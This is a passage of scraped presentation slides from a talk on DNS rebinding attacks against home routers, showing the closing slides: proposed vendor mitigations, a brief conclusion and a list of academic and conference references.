![Page 84: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/84.jpg)
Vendor / Industry Solutions
Fix the same-origin policy in browsers
Implement the strong end system model in routers
Build DNS rebinding mitigations into routers
![Page 85: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/85.jpg)
Conclusion
DNS rebinding still poses a threat to your LAN
Tools are available to exploit DNS rebinding
Only you can prevent forest fires
![Page 87: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/87.jpg)
References
Java Security: From HotJava to Netscape and Beyond
http://www.cs.princeton.edu/sip/pub/oakland-paper-96.pdf
Protecting Browsers From DNS Rebinding Attacks
http://crypto.stanford.edu/dns/dns-rebinding.pdf
Design Reviewing the Web
http://www.youtube.com/watch?v=cBF1zp8vR9M
Intranet Invasion Through Anti-DNS Pinning
https://www.blackhat.com/presentations/bh-usa-
07/Byrne/Presentation/bh-usa-07-byrne.pdf
Anti-DNS Pinning Demo
http://www.jumperz.net/index.php?i=2&a=3&b=3
![Page 88: How to Hack Millions of Routers - Formación | Eventos | Aulas · Multiple A Record Attack Better known as DNS load balancing / redundancy Return multiple IP addresses in DNS response](https://reader031.vdocument.in/reader031/viewer/2022022106/5be5555809d3f2d8348b6d83/html5/thumbnails/88.jpg)
References
Same Origin Policy
http://en.wikipedia.org/wiki/Same_origin_policy
RFC 1122
http://www.faqs.org/rfcs/rfc1122.html
Loopback and Multi-Homed Routing Flaw
http://seclists.org/bugtraq/2001/Mar/42
TCP/IP Illustrated Volume 2, W. Richard Stevens
p. 218 – 219